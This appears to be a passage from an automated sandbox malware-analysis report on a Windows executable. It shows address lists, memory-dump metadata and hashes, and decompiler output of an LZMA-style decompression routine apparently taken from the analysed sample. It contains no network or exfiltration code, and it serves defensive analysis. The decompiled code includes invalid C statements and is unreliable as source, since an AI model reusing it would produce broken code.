                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00000000
                                                                                                                        0x0040690d
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                        • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                                        • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                        • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
